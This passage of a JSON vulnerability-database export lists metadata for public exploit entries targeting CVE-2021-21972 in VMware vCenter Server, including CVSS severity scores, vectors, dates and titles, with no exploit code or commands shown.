"cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-03T12:09:53", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-04-03T12:10:03", "id": "64EF6553-4D22-526B-A1CC-09212DBD7625", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-11T21:49:58", "description": "# CVE-2021-21972\nProof of Concept Exploit for vCenter CVE-2021-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-24T16:31:34", "type": "githubexploit", "title": "Exploit for Missing Authentication for Critical Function in Vmware Vcenter Server", "bul